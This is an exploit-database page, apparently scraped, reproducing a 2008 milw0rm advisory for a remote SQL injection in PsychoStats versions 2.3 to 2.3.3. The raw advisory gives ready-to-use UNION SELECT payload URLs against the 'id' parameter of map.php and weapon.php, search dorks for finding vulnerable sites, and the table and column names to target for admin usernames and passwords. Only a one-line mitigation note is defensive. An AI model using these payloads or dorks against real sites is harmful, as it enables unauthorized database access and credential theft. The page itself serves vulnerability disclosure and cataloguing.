header-logo
Suggest Exploit
vendor:
PsychoStats
by:
Mr.SQL
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: PsychoStats
Affected Version From: v2.3
Affected Version To: v2.3.3
Patch Exists: Unknown
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Unknown

rEm0te SQL InjEction VulnErability

PsychoStats Versions (v2.3, v2.3.1, v2.3.3) are vulnerable to a remote SQL injection vulnerability. Attackers can exploit this vulnerability by sending malicious SQL queries to the vulnerable web application. The vulnerable parameters are ‘id’ in ‘map.php’ and ‘weapon.php’. Attackers can use the ‘union’ operator to retrieve data from the database. The vulnerable tables are ‘psuser’, ‘ps_user’, ‘psadmin’, and ‘pas_admin’. The vulnerable columns are ‘username’, ‘password’, ‘plr’, and ‘name’.

Mitigation:

Developers should use parameterized queries to prevent SQL injection attacks. Input validation should also be used to detect malicious inputs.
Source

Exploit-DB raw data:

###############################################################
#################### Viva IslaM Viva IslaM ####################
##
## rEm0te SQL InjEction VulnErability 
##
## PsychoStats Versions (( - v2.3 - v2.3.1 - v2.3.3 - )) ( map.php id ) & ( weapon.php id )
##                              
###############################################################
###############################################################
##
## AuTh0r : Mr.SQL   -(:: ThE Geek InjEcT0r ::)-
##
## H0ME   : WwW.PaL-HaCkEr.CoM
##
## Email  :  SQL@Hotmail.it
##
#########################
#########################
##
## Script Name  : PsychoStats Versions (( - v2.3 - v2.3.1 - v2.3.3 - ))
##
## Download ScriptS : www.psychostats.com/downloads/
##
## D0rk F0r all Versions ::   "Powered by PsychoStats"
##
#########################
#########################

n0te :: Tables  (( psuser  0r  ps_user 0r psadmin 0r pas_admin )) get the table_name maybe Sites changed tables :))
     :: columns (( username 0r password 0r plr 0r name ))
       & in the exploit dont use -

n0te :: The Script have diffrent Versions you can get the source and search for other bugs


#########################
#########################
##
## PsychoStats v2.3 
##
## D0rK ::  "Powered by PsychoStats v2.3"
##
#########################
##
##   -(:: SQL ::)-
##
##    www.site.com/
##          weapon.php?id=1+union+select+1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
##
#########################
#########################



#########################
#########################
##
## PsychoStats v2.3.1 
##
## D0rK ::  "Powered by PsychoStats v2.3.1"
##
#########################
##
##   -(:: SQL ::)-
##
##   www.site.com/
##          map.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10,11,user(),13,14,15,16,17--
##
#########################
#########################



#########################
#########################
##
## PsychoStats v2.3.3
##
## D0rK ::  "Powered by PsychoStats v2.3.3"
##
#########################
##
##   -(:: SQL ::)-
##
##     www.site.com/
##          weapon.php?id=1+union+select+1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*       
##
#########################
#########################


#############################################################################

                      -(:: Gr3E3E3E3E3E3E3Tz ::)-

  :: HaCkEr-EGy :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH :: 

#############################################################################

# milw0rm.com [2008-05-31]

Navigation

Suggest Exploit

Services By CQR